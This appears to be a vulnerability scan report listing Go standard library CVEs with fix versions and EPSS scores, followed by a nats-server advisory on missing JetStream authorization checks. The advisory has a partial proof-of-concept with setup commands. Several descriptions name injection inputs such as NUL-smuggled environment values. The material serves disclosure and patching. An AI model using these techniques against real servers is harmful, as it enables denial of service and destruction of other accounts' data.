stdlib 1.19.2 (golang)
pkg:golang/stdlib@1.19.2

| Affected range | <1.21.11 | | Fixed version | 1.21.11 | | EPSS Score | 0.082% | | EPSS Percentile | 24th percentile |
Description
The various Is methods (IsPrivate, IsLoopback, etc) did not work as expected for IPv4-mapped IPv6 addresses, returning false for addresses which would return true in their traditional IPv4 forms.

| Affected range | <1.19.9 | | Fixed version | 1.19.9 | | EPSS Score | 0.250% | | EPSS Percentile | 48th percentile |
Description
Not all valid JavaScript whitespace characters are considered to be whitespace. Templates containing whitespace characters outside of the character set "\t\n\f\r\u0020\u2028\u2029" in JavaScript contexts that also contain actions may not be properly sanitized during execution.

| Affected range | <1.19.8 | | Fixed version | 1.19.8 | | EPSS Score | 0.664% | | EPSS Percentile | 70th percentile |
Description
Templates do not properly consider backticks (`) as Javascript string delimiters, and do not escape them as expected.
Backticks are used, since ES6, for JS template literals. If a template contains a Go template action within a Javascript template literal, the contents of the action can be used to terminate the literal, injecting arbitrary Javascript code into the Go template.
As ES6 template literals are rather complex, and themselves can do string interpolation, the decision was made to simply disallow Go template actions from being used inside of them (e.g. "var a = {{.}}"), since there is no obviously safe way to allow this behavior. This takes the same approach as github.com/google/safehtml.
With fix, Template.Parse returns an Error when it encounters templates like this, with an ErrorCode of value 12. This ErrorCode is currently unexported, but will be exported in the release of Go 1.21.
Users who rely on the previous behavior can re-enable it using the GODEBUG flag jstmpllitinterp=1, with the caveat that backticks will now be escaped. This should be used with caution.

| Affected range | <1.23.8 | | Fixed version | 1.23.8 | | EPSS Score | 0.019% | | EPSS Percentile | 4th percentile |
Description
The net/http package improperly accepts a bare LF as a line terminator in chunked data chunk-size lines. This can permit request smuggling if a net/http server is used in conjunction with a server that incorrectly accepts a bare LF as part of a chunk-ext.

| Affected range | <1.19.10 | | Fixed version | 1.19.10 | | EPSS Score | 0.009% | | EPSS Percentile | 1st percentile |
Description
On Unix platforms, the Go runtime does not behave differently when a binary is run with the setuid/setgid bits. This can be dangerous in certain cases, such as when dumping memory state, or assuming the status of standard i/o file descriptors.
If a setuid/setgid binary is executed with standard I/O file descriptors closed, opening any files can result in unexpected content being read or written with elevated privileges. Similarly, if a setuid/setgid program is terminated, either via panic or signal, it may leak the contents of its registers.

| Affected range | <1.24.11 | | Fixed version | 1.24.11 | | EPSS Score | 0.016% | | EPSS Percentile | 3rd percentile |
Description
Within HostnameError.Error(), when constructing an error string, there is no limit to the number of hosts that will be printed out. Furthermore, the error string is constructed by repeated string concatenation, leading to quadratic runtime. Therefore, a certificate provided by a malicious actor can result in excessive resource consumption.

| Affected range | <1.24.8 | | Fixed version | 1.24.8 | | EPSS Score | 0.026% | | EPSS Percentile | 6th percentile |
Description
The ParseAddress function constructs domain-literal address components through repeated string concatenation. When parsing large domain-literal components, this can cause excessive CPU consumption.

| Affected range | <1.24.8 | | Fixed version | 1.24.8 | | EPSS Score | 0.026% | | EPSS Percentile | 6th percentile |
Description
The processing time for parsing some invalid inputs scales non-linearly with respect to the size of the input.
This affects programs which parse untrusted PEM inputs.

| Affected range | <1.24.8 | | Fixed version | 1.24.8 | | EPSS Score | 0.014% | | EPSS Percentile | 2nd percentile |
Description
Validating certificate chains which contain DSA public keys can cause programs to panic, due to a interface cast that assumes they implement the Equal method.
This affects programs which validate arbitrary certificate chains.

| Affected range | <1.24.9 | | Fixed version | 1.24.9 | | EPSS Score | 0.015% | | EPSS Percentile | 3rd percentile |
Description
Due to the design of the name constraint checking algorithm, the processing time of some inputs scale non-linearly with respect to the size of the certificate.
This affects programs which validate arbitrary certificate chains.

| Affected range | <1.22.7 | | Fixed version | 1.22.7 | | EPSS Score | 0.147% | | EPSS Percentile | 36th percentile |
Description
Calling Parse on a "// +build" build tag line with deeply nested expressions can cause a panic due to stack exhaustion.

| Affected range | <1.22.7 | | Fixed version | 1.22.7 | | EPSS Score | 0.298% | | EPSS Percentile | 53rd percentile |
Description
Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion. This is a follow-up to CVE-2022-30635.

| Affected range | <1.21.12 | | Fixed version | 1.21.12 | | EPSS Score | 0.618% | | EPSS Percentile | 69th percentile |
Description
The net/http HTTP/1.1 client mishandled the case where a server responds to a request with an "Expect: 100-continue" header with a non-informational (200 or higher) status. This mishandling could leave a client connection in an invalid state, where the next request sent on the connection will fail.
An attacker sending a request to a net/http/httputil.ReverseProxy proxy can exploit this mishandling to cause a denial of service by sending "Expect: 100-continue" requests which elicit a non-informational response from the backend. Each such request leaves the proxy with an invalid connection, and causes one subsequent request using that connection to fail.

| Affected range | <1.21.8 | | Fixed version | 1.21.8 | | EPSS Score | 1.498% | | EPSS Percentile | 81st percentile |
Description
The ParseAddressList function incorrectly handles comments (text within parentheses) within display names. Since this is a misalignment with conforming address parsers, it can result in different trust decisions being made by programs using different parsers.

| Affected range | <1.21.9 | | Fixed version | 1.21.9 | | EPSS Score | 66.635% | | EPSS Percentile | 98th percentile |
Description
An attacker may cause an HTTP/2 endpoint to read arbitrary amounts of header data by sending an excessive number of CONTINUATION frames.
Maintaining HPACK state requires parsing and processing all HEADERS and CONTINUATION frames on a connection. When a request's headers exceed MaxHeaderBytes, no memory is allocated to store the excess headers, but they are still parsed.
This permits an attacker to cause an HTTP/2 endpoint to read arbitrary amounts of header data, all associated with a request which is going to be rejected. These headers can include Huffman-encoded data which is significantly more expensive for the receiver to decode than for an attacker to send.
The fix sets a limit on the amount of excess header frames we will process before closing a connection.

| Affected range | <1.20.0 | | Fixed version | 1.20.0 | | EPSS Score | 0.185% | | EPSS Percentile | 40th percentile |
Description
Before Go 1.20, the RSA based TLS key exchanges used the math/big library, which is not constant time. RSA blinding was applied to prevent timing attacks, but analysis shows this may not have been fully effective. In particular it appears as if the removal of PKCS#1 padding may leak timing information, which in turn could be used to recover session key bits.
In Go 1.20, the crypto/tls library switched to a fully constant time RSA implementation, which we do not believe exhibits any timing side channels.

| Affected range | <1.20.11 | | Fixed version | 1.20.11 | | EPSS Score | 0.097% | | EPSS Percentile | 27th percentile |
Description
The filepath package does not recognize paths with a ??\ prefix as special.
On Windows, a path beginning with ??\ is a Root Local Device path equivalent to a path beginning with \?. Paths with a ??\ prefix may be used to access arbitrary locations on the system. For example, the path ??\c:\x is equivalent to the more common path c:\x.
Before fix, Clean could convert a rooted path such as \a..??\b into the root local device path ??\b. Clean will now convert this to .??\b.
Similarly, Join(, ??, b) could convert a seemingly innocent sequence of path elements into the root local device path ??\b. Join will now convert this to .??\b.
In addition, with fix, IsAbs now correctly reports paths beginning with ??\ as absolute, and VolumeName correctly reports the ??\ prefix as a volume name.
UPDATE: Go 1.20.11 and Go 1.21.4 inadvertently changed the definition of the volume name in Windows paths starting with ?, resulting in filepath.Clean(?\c:) returning ?\c: rather than ?\c:\ (among other effects). The previous behavior has been restored.

| Affected range | <1.20.10 | | Fixed version | 1.20.10 | | EPSS Score | 94.419% | | EPSS Percentile | 100th percentile |
Description
A malicious HTTP/2 client which rapidly creates requests and immediately resets them can cause excessive server resource consumption. While the total number of requests is bounded by the http2.Server.MaxConcurrentStreams setting, resetting an in-progress request allows the attacker to create a new request while the existing one is still executing.
With the fix applied, HTTP/2 servers now bound the number of simultaneously executing handler goroutines to the stream concurrency limit (MaxConcurrentStreams). New requests arriving when at the limit (which can only happen after the client has reset an existing, in-flight request) will be queued until a handler exits. If the request queue grows too large, the server will terminate the connection.
This issue is also fixed in golang.org/x/net/http2 for users manually configuring HTTP/2.
The default stream concurrency limit is 250 streams (requests) per HTTP/2 connection. This value may be adjusted using the golang.org/x/net/http2 package; see the Server.MaxConcurrentStreams setting and the ConfigureServer function.

| Affected range | <1.20.10 | | Fixed version | 1.20.10 | | EPSS Score | 0.163% | | EPSS Percentile | 38th percentile |
Description
A malicious HTTP/2 client which rapidly creates requests and immediately resets them can cause excessive server resource consumption. While the total number of requests is bounded by the http2.Server.MaxConcurrentStreams setting, resetting an in-progress request allows the attacker to create a new request while the existing one is still executing.
With the fix applied, HTTP/2 servers now bound the number of simultaneously executing handler goroutines to the stream concurrency limit (MaxConcurrentStreams). New requests arriving when at the limit (which can only happen after the client has reset an existing, in-flight request) will be queued until a handler exits. If the request queue grows too large, the server will terminate the connection.
This issue is also fixed in golang.org/x/net/http2 for users manually configuring HTTP/2.
The default stream concurrency limit is 250 streams (requests) per HTTP/2 connection. This value may be adjusted using the golang.org/x/net/http2 package; see the Server.MaxConcurrentStreams setting and the ConfigureServer function.

| Affected range | <1.19.8 | | Fixed version | 1.19.8 | | EPSS Score | 0.013% | | EPSS Percentile | 2nd percentile |
Description
Calling any of the Parse functions on Go source code which contains //line directives with very large line numbers can cause an infinite loop due to integer overflow.

| Affected range | <1.19.8 | | Fixed version | 1.19.8 | | EPSS Score | 0.059% | | EPSS Percentile | 19th percentile |
Description
Multipart form parsing can consume large amounts of CPU and memory when processing form inputs containing very large numbers of parts.
This stems from several causes:
- mime/multipart.Reader.ReadForm limits the total memory a parsed multipart form can consume. ReadForm can undercount the amount of memory consumed, leading it to accept larger inputs than intended.
- Limiting total memory does not account for increased pressure on the garbage collector from large numbers of small allocations in forms with many parts.
- ReadForm can allocate a large number of short-lived buffers, further increasing pressure on the garbage collector.
The combination of these factors can permit an attacker to cause an program that parses multipart forms to consume large amounts of CPU and memory, potentially resulting in a denial of service. This affects programs that use mime/multipart.Reader.ReadForm, as well as form parsing in the net/http package with the Request methods FormFile, FormValue, ParseMultipartForm, and PostFormValue.
With fix, ReadForm now does a better job of estimating the memory consumption of parsed forms, and performs many fewer short-lived allocations.
In addition, the fixed mime/multipart.Reader imposes the following limits on the size of parsed forms:
- Forms parsed with ReadForm may contain no more than 1000 parts. This limit may be adjusted with the environment variable GODEBUG=multipartmaxparts=.
- Form parts parsed with NextPart and NextRawPart may contain no more than 10,000 header fields. In addition, forms parsed with ReadForm may contain no more than 10,000 header fields across all parts. This limit may be adjusted with the environment variable GODEBUG=multipartmaxheaders=.

| Affected range | <1.19.8 | | Fixed version | 1.19.8 | | EPSS Score | 0.040% | | EPSS Percentile | 12th percentile |
Description
HTTP and MIME header parsing can allocate large amounts of memory, even when parsing small inputs, potentially leading to a denial of service.
Certain unusual patterns of input data can cause the common function used to parse HTTP and MIME headers to allocate substantially more memory than required to hold the parsed headers. An attacker can exploit this behavior to cause an HTTP server to allocate large amounts of memory from a small request, potentially leading to memory exhaustion and a denial of service.
With fix, header parsing now correctly allocates only the memory required to hold parsed headers.

| Affected range | <1.19.6 | | Fixed version | 1.19.6 | | EPSS Score | 0.046% | | EPSS Percentile | 14th percentile |
Description
A denial of service is possible from excessive resource consumption in net/http and mime/multipart.
Multipart form parsing with mime/multipart.Reader.ReadForm can consume largely unlimited amounts of memory and disk files. This also affects form parsing in the net/http package with the Request methods FormFile, FormValue, ParseMultipartForm, and PostFormValue.
ReadForm takes a maxMemory parameter, and is documented as storing "up to maxMemory bytes +10MB (reserved for non-file parts) in memory". File parts which cannot be stored in memory are stored on disk in temporary files. The unconfigurable 10MB reserved for non-file parts is excessively large and can potentially open a denial of service vector on its own. However, ReadForm did not properly account for all memory consumed by a parsed form, such as map entry overhead, part names, and MIME headers, permitting a maliciously crafted form to consume well over 10MB. In addition, ReadForm contained no limit on the number of disk files created, permitting a relatively small request body to create a large number of disk temporary files.
With fix, ReadForm now properly accounts for various forms of memory overhead, and should now stay within its documented limit of 10MB + maxMemory bytes of memory consumption. Users should still be aware that this limit is high and may still be hazardous.
In addition, ReadForm now creates at most one on-disk temporary file, combining multiple form parts into a single temporary file. The mime/multipart.File interface type's documentation states, "If stored on disk, the File's underlying concrete type will be an *os.File.". This is no longer the case when a form contains more than one file part, due to this coalescing of parts into a single file. The previous behavior of using distinct files for each form part may be reenabled with the environment variable GODEBUG=multipartfiles=distinct.
Users should be aware that multipart.ReadForm and the http.Request methods that call it do not limit the amount of disk consumed by temporary files. Callers can limit the size of form data with http.MaxBytesReader.

| Affected range | <1.19.6 | | Fixed version | 1.19.6 | | EPSS Score | 0.016% | | EPSS Percentile | 3rd percentile |
Description
Large handshake records may cause panics in crypto/tls.
Both clients and servers may send large TLS handshake records which cause servers and clients, respectively, to panic when attempting to construct responses.
This affects all TLS 1.3 clients, TLS 1.2 clients which explicitly enable session resumption (by setting Config.ClientSessionCache to a non-nil value), and TLS 1.3 servers which request client certificates (by setting Config.ClientAuth >= RequestClientCert).

| Affected range | <1.19.6 | | Fixed version | 1.19.6 | | EPSS Score | 0.235% | | EPSS Percentile | 46th percentile |
Description
A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.

| Affected range | <1.19.6 | | Fixed version | 1.19.6 | | EPSS Score | 0.169% | | EPSS Percentile | 38th percentile |
Description
A path traversal vulnerability exists in filepath.Clean on Windows.
On Windows, the filepath.Clean function could transform an invalid path such as "a/../c:/b" into the valid path "c:\b". This transformation of a relative (if invalid) path into an absolute path could enable a directory traversal attack.
After fix, the filepath.Clean function transforms this path into the relative (but still invalid) path ".\c:\b".

| Affected range | >=1.19.0-0 <1.19.4
| | Fixed version | 1.19.4 | | EPSS Score | 0.057% | | EPSS Percentile | 18th percentile |
Description
On Windows, restricted files can be accessed via os.DirFS and http.Dir.
The os.DirFS function and http.Dir type provide access to a tree of files rooted at a given directory. These functions permit access to Windows device files under that root. For example, os.DirFS("C:/tmp").Open("COM1") opens the COM1 device. Both os.DirFS and http.Dir only provide read-only filesystem access.
In addition, on Windows, an os.DirFS for the directory (the root of the current drive) can permit a maliciously crafted path to escape from the drive and access any path on the system.
With fix applied, the behavior of os.DirFS("") has changed. Previously, an empty root was treated equivalently to "/", so os.DirFS("").Open("tmp") would open the path "/tmp". This now returns an error.

| Affected range | >=1.19.0-0 <1.19.3
| | Fixed version | 1.19.3 | | EPSS Score | 0.022% | | EPSS Percentile | 5th percentile |
Description
Due to unsanitized NUL values, attackers may be able to maliciously set environment variables on Windows.
In syscall.StartProcess and os/exec.Cmd, invalid environment variable values containing NUL values are not properly checked for. A malicious environment variable value can exploit this behavior to set a value for a different environment variable. For example, the environment variable string "A=B\x00C=D" sets the variables "A=B" and "C=D".

| Affected range | <1.22.7 | | Fixed version | 1.22.7 | | EPSS Score | 0.160% | | EPSS Percentile | 37th percentile |
Description
Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion. This is a follow-up to CVE-2022-30635.

| Affected range | <1.19.9 | | Fixed version | 1.19.9 | | EPSS Score | 0.049% | | EPSS Percentile | 15th percentile |
Description
Templates containing actions in unquoted HTML attributes (e.g. "attr={{.}}") executed with empty input can result in output with unexpected results when parsed due to HTML normalization rules. This may allow injection of arbitrary attributes into tags.

| Affected range | <1.19.9 | | Fixed version | 1.19.9 | | EPSS Score | 0.067% | | EPSS Percentile | 21st percentile |
Description
Angle brackets (<>) are not considered dangerous characters when inserted into CSS contexts. Templates containing multiple actions separated by a '/' character can result in unexpectedly closing the CSS context and allowing for injection of unexpected HTML, if executed with untrusted input.

| Affected range | <1.23.10 | | Fixed version | 1.23.10 | | EPSS Score | 0.010% | | EPSS Percentile | 1st percentile |
Description
Proxy-Authorization and Proxy-Authenticate headers persisted on cross-origin redirects potentially leaking sensitive information.

| Affected range | <1.24.11 | | Fixed version | 1.24.11 | | EPSS Score | 0.021% | | EPSS Percentile | 5th percentile |
Description
An excluded subdomain constraint in a certificate chain does not restrict the usage of wildcard SANs in the leaf certificate. For example a constraint that excludes the subdomain test.example.com does not prevent a leaf certificate from claiming the SAN *.example.com.

| Affected range | <1.23.12 | | Fixed version | 1.23.12 | | EPSS Score | 0.020% | | EPSS Percentile | 5th percentile |
Description
If the PATH environment variable contains paths which are executables (rather than just directories), passing certain strings to LookPath ("", ".", and ".."), can result in the binaries listed in the PATH being unexpectedly returned.

| Affected range | <1.21.8 | | Fixed version | 1.21.8 | | EPSS Score | 0.362% | | EPSS Percentile | 58th percentile |
Description
When parsing a multipart form (either explicitly with Request.ParseMultipartForm or implicitly with Request.FormValue, Request.PostFormValue, or Request.FormFile), limits on the total size of the parsed form were not applied to the memory consumed while reading a single form line. This permits a maliciously crafted input containing very long lines to cause allocation of arbitrarily large amounts of memory, potentially leading to memory exhaustion.
With fix, the ParseMultipartForm function now correctly limits the maximum size of form lines.

| Affected range | <1.19.11 | | Fixed version | 1.19.11 | | EPSS Score | 0.236% | | EPSS Percentile | 46th percentile |
Description
The HTTP/1 client does not fully validate the contents of the Host header. A maliciously crafted Host header can inject additional headers or entire requests.
With fix, the HTTP/1 client now refuses to send requests containing an invalid Request.Host or Request.URL.Host value.

| Affected range | <1.22.11 | | Fixed version | 1.22.11 | | EPSS Score | 0.048% | | EPSS Percentile | 15th percentile |
Description
A certificate with a URI which has a IPv6 address with a zone ID may incorrectly satisfy a URI name constraint that applies to the certificate chain.
Certificates containing URIs are not permitted in the web PKI, so this only affects users of private PKIs which make use of URIs.

| Affected range | <1.22.11 | | Fixed version | 1.22.11 | | EPSS Score | 0.078% | | EPSS Percentile | 24th percentile |
Description
The HTTP client drops sensitive headers after following a cross-domain redirect. For example, a request to a.com/ containing an Authorization header which is redirected to b.com/ will not send that header to b.com.
In the event that the client received a subsequent same-domain redirect, however, the sensitive headers would be restored. For example, a chain of redirects from a.com/, to b.com/1, and finally to b.com/2 would incorrectly send the Authorization header to b.com/2.

| Affected range | <1.20.8 | | Fixed version | 1.20.8 | | EPSS Score | 0.085% | | EPSS Percentile | 25th percentile |
Description
The html/template package does not apply the proper rules for handling occurrences of "<script", "<!--", and "</script" within JS literals in
</blockquote>
</details>
<a href="https://scout.docker.com/v/CVE-2023-39318?s=golang&n=stdlib&t=golang&vr=%3C1.20.8"><img alt="medium : CVE--2023--39318" src="https://img.shields.io/badge/CVE--2023--39318-lightgrey?label=medium%20&labelColor=fbb552"/></a>
| Affected range | <1.20.8 | | Fixed version | 1.20.8 | | EPSS Score | 0.085% | | EPSS Percentile | 25th percentile |
Description
The html/template package does not properly handle HTML-like "" comment tokens, nor hashbang "#!" comment tokens, in
</blockquote>
</details>
<a href="https://scout.docker.com/v/CVE-2024-24783?s=golang&n=stdlib&t=golang&vr=%3C1.21.8"><img alt="medium : CVE--2024--24783" src="https://img.shields.io/badge/CVE--2024--24783-lightgrey?label=medium%20&labelColor=fbb552"/></a>
| Affected range | <1.21.8 | | Fixed version | 1.21.8 | | EPSS Score | 0.445% | | EPSS Percentile | 63rd percentile |
Description
Verifying a certificate chain which contains a certificate with an unknown public key algorithm will cause Certificate.Verify to panic.
This affects all crypto/tls clients, and servers that set Config.ClientAuth to VerifyClientCertIfGiven or RequireAndVerifyClientCert. The default behavior is for TLS servers to not verify client certificates.

| Affected range | <1.23.10 | | Fixed version | 1.23.10 | | EPSS Score | 0.008% | | EPSS Percentile | 1st percentile |
Description
os.OpenFile(path, os.O_CREATE|O_EXCL) behaved differently on Unix and Windows systems when the target path was a dangling symlink. On Unix systems, OpenFile with O_CREATE and O_EXCL flags never follows symlinks. On Windows, when the target path was a symlink to a nonexistent location, OpenFile would create a file in that location. OpenFile now always returns an error when the O_CREATE and O_EXCL flags are both set and the target path is a symlink.

| Affected range | <1.21.11 | | Fixed version | 1.21.11 | | EPSS Score | 0.006% | | EPSS Percentile | 0th percentile |
Description
The archive/zip package's handling of certain types of invalid zip files differs from the behavior of most zip implementations. This misalignment could be exploited to create an zip file with contents that vary depending on the implementation reading the file. The archive/zip package now rejects files containing these errors.

| Affected range | <1.21.8 | | Fixed version | 1.21.8 | | EPSS Score | 0.273% | | EPSS Percentile | 50th percentile |
Description
If errors returned from MarshalJSON methods contain user controlled data, they may be used to break the contextual auto-escaping behavior of the html/template package, allowing for subsequent actions to inject unexpected content into templates.

| Affected range | <1.24.8 | | Fixed version | 1.24.8 | | EPSS Score | 0.025% | | EPSS Percentile | 6th percentile |
Description
The Reader.ReadResponse function constructs a response string through repeated string concatenation of lines. When the number of lines in a response is large, this can cause excessive CPU consumption.

| Affected range | <1.24.8 | | Fixed version | 1.24.8 | | EPSS Score | 0.019% | | EPSS Percentile | 4th percentile |
Description
When Conn.Handshake fails during ALPN negotiation the error contains attacker controlled information (the ALPN protocols sent by the client) which is not escaped.

| Affected range | <1.24.8 | | Fixed version | 1.24.8 | | EPSS Score | 0.029% | | EPSS Percentile | 7th percentile |
Description
Despite HTTP headers having a default limit of 1MB, the number of cookies that can be parsed does not have a limit. By sending a lot of very small cookies such as "a=;", an attacker can make an HTTP server allocate a large amount of structs, causing large memory consumption.

| Affected range | <1.24.8 | | Fixed version | 1.24.8 | | EPSS Score | 0.033% | | EPSS Percentile | 9th percentile |
Description
Parsing a maliciously crafted DER payload could allocate large amounts of memory, causing memory exhaustion.

| Affected range | <1.24.8 | | Fixed version | 1.24.8 | | EPSS Score | 0.025% | | EPSS Percentile | 6th percentile |
Description
The Parse function permits values other than IPv6 addresses to be included in square brackets within the host component of a URL. RFC 3986 permits IPv6 addresses to be included within the host component, enclosed within square brackets. For example: "http://[::1]/". IPv4 addresses and hostnames must not appear within square brackets. Parse did not enforce this requirement.

| Affected range | <1.20.11 | | Fixed version | 1.20.11 | | EPSS Score | 0.040% | | EPSS Percentile | 12th percentile |
Description
On Windows, The IsLocal function does not correctly detect reserved device names in some cases.
Reserved names followed by spaces, such as "COM1 ", and reserved names "COM" and "LPT" followed by superscript 1, 2, or 3, are incorrectly reported as local.
With fix, IsLocal now correctly reports these names as non-local.

| Affected range | <1.20.12 | | Fixed version | 1.20.12 | | EPSS Score | 0.048% | | EPSS Percentile | 15th percentile |
Description
A malicious HTTP sender can use chunk extensions to cause a receiver reading from a request or response body to read many more bytes from the network than are in the body.
A malicious HTTP client can further exploit this to cause a server to automatically read a large amount of data (up to about 1GiB) when a handler fails to read the entire body of a request.
Chunk extensions are a little-used HTTP feature which permit including additional metadata in a request or response body sent using the chunked encoding. The net/http chunked encoding reader discards this metadata. A sender can exploit this by inserting a large metadata segment with each byte transferred. The chunk reader now produces an error if the ratio of real body to encoded bytes grows too small.

| Affected range | <1.19.12 | | Fixed version | 1.19.12 | | EPSS Score | 0.112% | | EPSS Percentile | 30th percentile |
Description
Extremely large RSA keys in certificate chains can cause a client/server to expend significant CPU time verifying signatures.
With fix, the size of RSA keys transmitted during handshakes is restricted to <= 8192 bits.
Based on a survey of publicly trusted RSA keys, there are currently only three certificates in circulation with keys larger than this, and all three appear to be test certificates that are not actively deployed. It is possible there are larger keys in use in private PKIs, but we target the web PKI, so causing breakage here in the interests of increasing the default safety of users of crypto/tls seems reasonable.

| Affected range | <1.19.7 | | Fixed version | 1.19.7 | | EPSS Score | 0.024% | | EPSS Percentile | 6th percentile |
Description
The ScalarMult and ScalarBaseMult methods of the P256 Curve may return an incorrect result if called with some specific unreduced scalars (a scalar larger than the order of the curve).
This does not impact usages of crypto/ecdsa or crypto/ecdh.

| Affected range | >=1.19.0-0 <1.19.4
| | Fixed version | 1.19.4 | | EPSS Score | 0.541% | | EPSS Percentile | 67th percentile |
Description
An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests.
HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.

| Affected range | <1.24.8 | | Fixed version | 1.24.8 | | EPSS Score | 0.014% | | EPSS Percentile | 2nd percentile |
Description
tar.Reader does not set a maximum size on the number of sparse region data blocks in GNU tar pax 1.0 sparse files. A maliciously-crafted archive containing a large number of sparse regions can cause a Reader to read an unbounded amount of data from the archive into memory. When reading from a compressed source, a small compressed input can result in large allocations.

| Affected range | <1.22.7 | | Fixed version | 1.22.7 | | EPSS Score | 0.073% | | EPSS Percentile | 22nd percentile |
Description
Calling any of the Parse functions on Go source code which contains deeply nested literals can cause a panic due to stack exhaustion.

| Affected range | <1.21.8 | | Fixed version | 1.21.8 | | EPSS Score | 0.454% | | EPSS Percentile | 63rd percentile |
Description
When following an HTTP redirect to a domain which is not a subdomain match or exact match of the initial domain, an http.Client does not forward sensitive headers such as "Authorization" or "Cookie". For example, a redirect from foo.com to www.foo.com will forward the Authorization header, but a redirect to bar.com will not.
A maliciously crafted HTTP redirect could cause sensitive headers to be unexpectedly forwarded.

| Affected range | <1.22.12 | | Fixed version | 1.22.12 | | EPSS Score | 0.017% | | EPSS Percentile | 3rd percentile |
Description
Due to the usage of a variable time instruction in the assembly implementation of an internal function, a small number of bits of secret scalars are leaked on the ppc64le architecture. Due to the way this function is used, we do not believe this leakage is enough to allow recovery of the private key when P-256 is used in any well known protocols.
|
github.com/nats-io/nats-server/v2 2.9.2 (golang)
pkg:golang/github.com/nats-io/nats-server@2.9.2#v2
Improper Authorization
| Affected range | >=2.2.0 <2.10.27
| | Fixed version | 2.10.27 | | CVSS Score | 9.6 | | CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H | | EPSS Score | 0.053% | | EPSS Percentile | 17th percentile |
Description
Advisory
The management of JetStream assets happens with messages in the $JS. subject namespace in the system account; this is partially exposed into regular accounts to allow account holders to manage their assets.
Some of the JS API requests were missing access controls, allowing any user with JS management permissions in any account to perform certain administrative actions on any JS asset in any other account. At least one of the unprotected APIs allows for data destruction. None of the affected APIs allow disclosing stream contents.
Affected versions
NATS Server:
- Version 2 from v2.2.0 onwards, prior to v2.11.1 or v2.10.27
Original Report
(Lightly edited to confirm some supposition and in the summary to use past tense)
Summary
nats-server did not include authorization checks on 4 separate admin-level JetStream APIs: account purge, server remove, account stream move, and account stream cancel-move.
In all cases, APIs are not properly restricted to system-account users. Instead, any authorized user can execute the APIs, including across account boundaries, as long as the current user merely has permission to publish on $JS.>.
Only the first seems to be of highest severity. All are included in this single report as they seem likely to have the same underlying root cause.
Reproduction of the ACCOUNT.PURGE case is below. The others are like it.
Details & Impact
Issue 1: $JS.API.ACCOUNT.PURGE.*
Any user may perform an account purge of any other account (including their own).
Risk: total destruction of Jetstream configuration and data.
Issue 2: $JS.API.SERVER.REMOVE
Any user may remove servers from Jetstream clusters.
Risk: Loss of data redundancy, reduction of service quality.
Issue 3: $JS.API.ACCOUNT.STREAM.MOVE.*.* and CANCEL_MOVE
Any user may cause streams to be moved between servers.
Risk: loss of control of data provenance, reduced service quality during move, enumeration of account and/or stream names.
Similarly for $JS.API.ACCOUNT.STREAM.CANCEL_MOVE.*.*
Mitigations
It appears that users without permission to publish on $JS.API.ACCOUNT.> or $JS.API.SERVER.> are unable to execute the above APIs.
Unfortunately, in many configurations, an 'admin' user for a single account will be given permissions for $JS.> (or simply >), which allows the improper access to the system APIs above.
Scope of impact
Issues 1 and 3 both cross boundaries between accounts, violating promised account isolation. All 3 allow system level access to non-system account users.
While I cannot speak to what authz configurations are actually found in the wild, per the discussion in Mitigations above, it seems likely that at least some configurations are vulnerable.
Additional notes
It appears that $JS.API.META.LEADER.STEPDOWN does properly restrict to system account users. As such, this may be a pattern for how to properly authorize these other APIs.
PoC
Environment
Tested with:
nats-server 2.10.26 (installed via homebrew)
nats cli 0.1.6 (installed via homebrew)
macOS 13.7.4
Reproduction steps
$ nats-server --version nats-server: v2.10.26
$ nats --version 0.1.6
$ cat nats-server.conf listen: '0.0.0.0:4233' jetstream: { store_dir: './tmp' } accounts: { '$SYS': { users: [{user: 'sys', password: 'sys'}] }, 'TEST': { jetstream: true, users: [{user: 'a', password: 'a'}] }, 'TEST2': { jetstream: true, users: [{user: 'b', password: 'b'}] } }
$ nats-server -c ./nats-server.conf ... [90608] 2025/03/02 11:43:18.494663 [INF] Using configuration file: ./nats-server.conf ... [90608] 2025/03/02 11:43:18.496395 [INF] Listening for client connections on 0.0.0.0:4233 ...
# Authentication is effectively enabled by the server: $ nats -s nats://localhost:4233 account info nats: error: setup failed: nats: Authorization Violation
$ nats -s nats://localhost:4233 account info --user sys --password wrong nats: error: setup failed: nats: Authorization Violation
$ nats -s nats://localhost:4233 account info --user a --password wrong nats: error: setup failed: nats: Authorization Violation
$ nats -s nats://localhost:4233 account info --user b --password wrong nats: error: setup failed: nats: Authorization Violation
# Valid credentials work, and users properly matched to accounts: $ nats -s nats://localhost:4233 account info --user sys --password sys Account Information User: sys Account: $SYS ...
$ nats -s nats://localhost:4233 account info --user a --password a Account Information User: a Account: TEST ...
$ nats -s nats://localhost:4233 account info --user b --password b Account Information User: b Account: TEST2 ...
# Add a stream and messages to account TEST (user 'a'): $ nats -s nats://localhost:4233 --user a --password a stream add stream1 --subjects s1 --storage file --defaults Stream stream1 was created ...
$ nats -s nats://localhost:4233 --user a --password a publish s1 --count 3 "msg {{Count}}" 11:50:05 Published 5 bytes to "s1" 11:50:05 Published 5 bytes to "s1" 11:50:05 Published 5 bytes to "s1"
# Messages are correctly persisted on account TEST, and not on TEST2: $ nats -s nats://localhost:4233 --user a --password a stream ls ╭───────────────────────────────────────────────────────────────────────────────╮ │ Streams │ ├─────────┬─────────────┬─────────────────────┬───────── ─┬───────┬──────────────┤ │ Name │ Description │ Created │ Messages │ Size │ Last Message │ ├─────────┼─────────────┼─────────────────────┼──────────┼───────┼──────────────┤ │ stream1 │ │ 2025-03-02 11:48:49 │ 3 │ 111 B │ 46.01s │ ╰─────────┴─────────────┴─────────────────────┴──────────┴───────┴──────────────╯
$ nats -s nats://localhost:4233 --user b --password b stream ls No Streams defined
$ du -h tmp/jetstream 0B tmp/jetstream/TEST/streams/stream1/obs 8.0K tmp/jetstream/TEST/streams/stream1/msgs 16K tmp/jetstream/TEST/streams/stream1 16K tmp/jetstream/TEST/streams 16K tmp/jetstream/TEST 16K tmp/jetstream
